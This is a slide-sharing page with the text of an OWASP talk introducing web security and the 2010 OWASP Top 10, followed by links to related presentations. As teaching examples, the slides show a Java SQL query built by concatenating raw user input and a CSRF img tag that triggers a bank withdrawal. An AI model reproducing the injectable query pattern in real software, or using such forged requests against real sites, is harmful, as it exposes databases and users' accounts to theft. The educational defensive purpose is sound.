owasp
play

OWASP Daniel Brzozowski daniel@brzozowski.biz Agenda 1. Few words - PowerPoint PPT Presentation

Dec 05, 2023 •166 likes •747 views

OWASP Daniel Brzozowski daniel@brzozowski.biz Agenda 1. Few words about OWASP 2. Owasp resources 3. Setting up workstations 4. OWASP WebScarab/OWASP WebScarab-NG 5. O2 Platform About me In London since October 2010 Before that MCPD, MCTS,

  1. OWASP Daniel Brzozowski daniel@brzozowski.biz

  2. Agenda 1. Few words about OWASP 2. Owasp resources 3. Setting up workstations 4. OWASP WebScarab/OWASP WebScarab-NG 5. O2 Platform

  3. About me… In London since October 2010 Before that MCPD, MCTS, MCP OWASP WebScarab-NG & OWASP .NET Project Leader 3

  4. Introduction – Web security Growing popularity of this subject … What is a security bug? Why we have such bugs? What about statistics? 4

  5. Penetration test What is a penetration test? Types Passive Mapping Research Attack Raport application Active 5

  6. OWASP 6

  7. What is OWASP? The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. OPEN INNOVATION GLOBAL INTEGRITY 7

  8. OWASP local chapters 8

  9. OWASP London Chapter Led by Justin Clarke Meetings Visit page: https://www.owasp.org/index.php/London And subscribe to mailing list! 9

  10. OWASP Resources you can use today! SDLC • Guides ( Testing , Development, Code Review) • SAMM • ASVS Community • Mailing lists • Chapters • Conferences Tools • WebGoat • WebScarab/WebScarab-NG • ESAPI • O2 Platform • OWASP Live CD •… 10

  11. OWASP Live CD https://www.owasp.org/index.php/Category:OWASP_Live_ CD_Project

  12. OWASP TOP 10 12

  13. OWASP Top 10 A3: Broken A4: Insecure Authentication A1: Injection A2: XSS Direct Object and Session References Management A7: Insecure A8: Failure to A6: Security A5: CSRF Cryptographic Restrict URL Misconfiguration Storage Access A9: Insufficient A10: Unvalidated Transport Layer Redirects and Protection Forwards 13

  14. A1: Injection Injection means… • Tricking an application into including unintended commands in the data sent to an interpreter Interpreters… • Take strings and interpret them as commands • SQL, OS Shell, LDAP, XPath , Hibernate, etc… SQL injection is still quite common •Many applications still susceptible (really don‟t know why) •Even though it‟s usually very simple to avoid Typical Impact • Usually severe. Entire database can usually be read or modified • May also allow full database schema, or account access, or even OS level access 14

  15. Attack example – OWASP TOP10 A1: Injection: SQL INJECTION User Hacker String userInput = s.getParser().getRawParameter(USERNAME, ""); String SELECT_ST = "select * from employee where userid="+ userInput; 15

  16. A1: Injection December 2009 • a hacker used SQL Injection techniques to hack the database of RockYou • RockYou creates applications for MySpace, Facebook, ... Result • data of 32.603.388 users and administrative accounts was compromised (credentials + clear text passwords) • the data also contained email-addresses and passwords for 3rd party sites Question: how many of those users use the same password for other sites too? 16

  17. A2: XSS Occurs any time… • Raw data from attacker is sent to an innocent user‟s browser Raw data… • Stored in database • Reflected from web input (form field, hidden field, URL, etc…) • Sent directly into rich JavaScript client Typical Impact • Steal user‟s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site • Most Severe: Install XSS proxy which allows attacker to observe and direct all user‟s behavior on vulnerable site and force user to other sites 17

  18. A2: XSS „ A new cross-site scripting (XSS) weakness identified on Twitter and can be leveraged by attackers to hijack users' sessions and post on their behalf. ” Posted on xssed.com http://www.xssed.com/mirr or/68655/ 18

  19. A3: Broken Authentication and Session Management HTTP is a “stateless” protocol • Means credentials have to go with every request • Should use SSL for everything requiring authentication Session management flaws • SESSION ID used to track state since HTTP doesn‟t • and it is just as good as credentials to an attacker • SESSION ID is typically exposed on the network, in browser, in logs, … Beware the side-doors • Change my password, remember my password, forgot my password, secret question, logout, email address, etc… Typical Impact • User accounts compromised or user sessions hijacked 19

  20. A4: Insecure Direct Object References How do you protect access to your data? • This is part of enforcing proper “Authorization”, along with A7 – Failure to Restrict URL Access A common mistake … • Only listing the „authorized‟ objects for the current user, or • Hiding the object references in hidden fields • … and then not enforcing these restrictions on the server side • This is called presentation layer access control, and doesn‟t work • Attacker simply tampers with parameter value Typical Impact • Users are able to access unauthorized files or data 20

  21. A4: Insecure Direct Object References 21

  22. A5: CSRF Cross Site Request Forgery • An attack where the victim‟s browser is tricked into issuing a command to a vulnerable web application • Vulnerability is caused by browsers automatically including user authentication data (session ID, IP address, Windows domain credentials, …) with each request Imagine… • What if a hacker could steer your mouse and get you to click on links in your online banking application? • What could they make you do? Typical Impact • Initiate transactions (transfer funds, logout user, close account) • Access sensitive data • Change account details 22

  23. A5: CSRF <img src="http://bank.com/withdraw?fromId=12314 &amount=1000000&toID=12312"> Can be injected by XSS From phishing site 23

  24. A5: CSRF April 2010 No specific details „the victim‟s transaction details will be sent to the attacker‟s Website” 24

  25. A6: Security Misconfiguration Web applications rely on a secure foundation • All through the network and platform • Don‟t forget the development environment Is your source code a secret? • Think of all the places your source code goes • Security should not require secret source code Configuration Management must extend to all parts of the application • All credentials should change in production Typical Impact • Install backdoor through missing network or server patch • XSS flaw exploits due to missing application framework patches • Unauthorized access to default accounts, application functionality or data, or unused but accessible functionality due to poor server configuration 25

  26. A7: Insecure Cryptographic Storage Storing sensitive data insecurely • Failure to identify all sensitive data • Failure to identify all the places that this sensitive data gets stored • Databases, files, directories, log files, backups, etc. • Failure to properly protect this data in every location Typical Impact • Attackers access or modify confidential or private information • e.g, credit cards, health care records, financial data (yours or your customers) • Attackers extract secrets to use in additional attacks • Company embarrassment, customer dissatisfaction, and loss of trust • Expense of cleaning up the incident, such as forensics, sending apology letters, reissuing thousands of credit cards, providing identity theft insurance • Business gets sued and/or fined 26

  27. A7: Insecure Cryptographic Storage 27

  28. A8: Failure to Restrict URL Access How do you protect access to URLs (pages)? • This is part of enforcing proper “authorization”, along with A4 – Insecure Direct Object References A common mistake … • Displaying only authorized links and menu choices • This is called presentation layer access control, and doesn‟t work • Attacker simply forges direct access to „unauthorized‟ pages Typical Impact • Attackers invoke functions and services they‟re not authorized for • Access other user‟s accounts and data • Perform privileged actions 28

  29. A8: Failure to Restrict URL Access Date published: 13/02/2010 Wordpress Version 2.9 Ability to view deleted messages by other users 29

  30. A9: Insufficient Transport Layer Protection Transmitting sensitive data insecurely • Failure to identify all sensitive data • Failure to identify all the places that this sensitive data is sent • On the web, to backend databases, to business partners, internal communications • Failure to properly protect this data in every location Typical Impact • Attackers access or modify confidential or private information • e.g, credit cards, health care records, financial data (yours or your customers) • Attackers extract secrets to use in additional attacks • Company embarrassment, customer dissatisfaction, and loss of trust • Expense of cleaning up the incident • Business gets sued and/or fined 30

  31. A9: Insufficient Transport Layer Protection 31

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200 OWASP Flagship Projects Tool Projects OWASP Amass OWASP CSRFGuard OWASP Defectdojo OWASP Dependency-Check OWASP Dependency-Track

751 views • 55 slides
OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com

OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com

Introduction to the OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com OWASP-Wellington/ http://hack-ed.com www.owasp.org.nz Recordings: @kirkj @owaspnz https://goo.gl/a2VSG2 What is OWASP? Open

880 views • 45 slides
OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation

OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation

The OWASP Foundation Libre Software Meeting Brussels 10-July-2013 http://www.owasp.org OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation Board Member OWASP Belgium Chapter Leader SAMM project

682 views • 43 slides
OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our

OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our

OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our community to remain vendor neutral with the collective wisdom of the best minds in software security worldwide. OWASP Foundation, NYC Chapter

382 views • 23 slides
Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017

Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017

Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017 Changes between 2013 and 2017 Hi, I am X. How do I get into AppSec/Security? OWASP Toronto Chapter January 17, 2018 Topics Overviews, Career Paths,

372 views • 36 slides
Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10

Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10

Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access

207 views • 6 slides
Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter

Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter

Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter Leader OWASP DevSlop Project Leader @SheHacksPurple About Me The Im Qualifed Slide Tanya Janca: Applicaton security evangelist, web

1k views • 82 slides
Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web

Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web

Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web Security Risks https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010-2017%20(en).pdf Today

998 views • 78 slides
Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva 12/12/2016 Jrmy MATOS whois securingapps Developer background Spent last 10 years working between Geneva and Lausanne on security products

867 views • 22 slides
SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access Control 6 Security

682 views • 8 slides
Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten

Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten

Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web Security Risks https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010-2017%20(en).pdf Today

916 views • 87 slides
Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German

Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German

Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German Day 20.11.2018 Carlos Holguera $ whoami Carlos Holguera [olera] Security Engineer working at ESCRYPT GmbH since 2012 Area of expertise:

790 views • 56 slides
UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is

UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is

UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is OWASP? Open Web Application Security Project Non-profit organization focused on improving security of software. They have some GREAT info on

372 views • 9 slides
OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place

OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place

OWASP Summit 2017 Why, how, what, where (v0.9, Jan 2017) Close your eyes Imagine a place where (some of ) the best Application Security and OWASP minds come together to collaborate and work a meeting of minds focused on solving

770 views • 37 slides
OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of

OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of

OWASP Most Critical Web Application Security Vulnerabilities Introduction 2 Purpose of Session: - Provide Overview Web Application Security Threats and Defense Using the Open Web Application Security Project (OWASP) Top List, we

830 views • 39 slides
Security Vulnerabilities Decomposition Katy Anton OWASP Top 10 @KatyAnton When the report is

Security Vulnerabilities Decomposition Katy Anton OWASP Top 10 @KatyAnton When the report is

Security Vulnerabilities Decomposition Katy Anton OWASP Top 10 @KatyAnton When the report is published @KatyAnton Katy Anton Software development background Project co-leader for OWASP Top 10 Proactive Controls (@OWASPControls)

1.21k views • 45 slides
Lattice study of gluon and ghost propagators in Landau gauge QCD E.M. Ilgenfritz

Lattice study of gluon and ghost propagators in Landau gauge QCD E.M. Ilgenfritz

Lattice study of gluon and ghost propagators in Landau gauge QCD E.M. Ilgenfritz Collaborators in Landau gauge lattice QCD: R. Aouane 1 1 HU Berlin Support by: I. L. Bogolubsky 2 2 JINR Dubna V. G. Bornyakov 3 , 4 3 ITEP Moscow F. Burger 1 4

666 views • 48 slides
AdS/CFT and Landau Fermi liquids Mikhail Goykhman Lorentz Institute, Leiden University Based on

AdS/CFT and Landau Fermi liquids Mikhail Goykhman Lorentz Institute, Leiden University Based on

AdS/CFT and Landau Fermi liquids Mikhail Goykhman Lorentz Institute, Leiden University Based on arXiv:1312.0463 [hep-th] in collaboration with Richard Davison and Andrei Parnachev Crete Center for Theoretical Physics March 6 2014 Mikhail

487 views • 30 slides
The reachability problem for vector addition systems with a stack is not elementary Ranko Lazi

The reachability problem for vector addition systems with a stack is not elementary Ranko Lazi

The reachability problem for vector addition systems with a stack is not elementary Ranko Lazi c DIMAP, Department of Computer Science, University of Warwick, UK Abstract Whereas computations of VAS Branching VAS. are words of vectors of

77 views • 4 slides
Classification of Spherical Quadrilaterals Alexandre Eremenko, Andrei Gabrielov, Vitaly Tarasov

Classification of Spherical Quadrilaterals Alexandre Eremenko, Andrei Gabrielov, Vitaly Tarasov

Classification of Spherical Quadrilaterals Alexandre Eremenko, Andrei Gabrielov, Vitaly Tarasov November 28, 2014 R 01 S 11 V 11 W U 11 11 1 R 11 S 11 V 11 W U 11 11 2 A spherical polygon is a surface homeomorphic to the closed disk, with

701 views • 38 slides
Professional responsibility and practice before the USPTO Office of Enrollment and Discipline

Professional responsibility and practice before the USPTO Office of Enrollment and Discipline

Professional responsibility and practice before the USPTO Office of Enrollment and Discipline United States Patent and Trademark Office Register of patent practitioners oedci.uspto.gov/OEDCI/ 3 Biennial registration statement Final rule

482 views • 31 slides
Professional responsibility and practice before the USPTO Office of Enrollment and Discipline

Professional responsibility and practice before the USPTO Office of Enrollment and Discipline

Professional responsibility and practice before the USPTO Office of Enrollment and Discipline United States Patent and Trademark Office Register of patent practitioners oedci.uspto.gov/OEDCI/ 3 Biennial registration statement Final rule

396 views • 35 slides
COVID-19: GP &amp; LP perspectives on valuations The webinar will begin shortly Please submit

COVID-19: GP &amp; LP perspectives on valuations The webinar will begin shortly Please submit

COVID-19: GP &amp; LP perspectives on valuations The webinar will begin shortly Please submit questions using the questions pane in the menu on the right of your screen BVCA Webinar | 05 May 2020 COVID-19: GP &amp; LP perspectives on

219 views • 6 slides
Mu2e Jason Bono on behalf of the Mu2e Collaboration Fermilab Users Meeting June 16, 2016

Mu2e Jason Bono on behalf of the Mu2e Collaboration Fermilab Users Meeting June 16, 2016

Mu2e Jason Bono on behalf of the Mu2e Collaboration Fermilab Users Meeting June 16, 2016 PREFACE Mu2e Mu2e will search for N eN with unprecedented sensitivity, (10 -17 ) e conversion is Charged Lepton Flavor

690 views • 52 slides

More recommend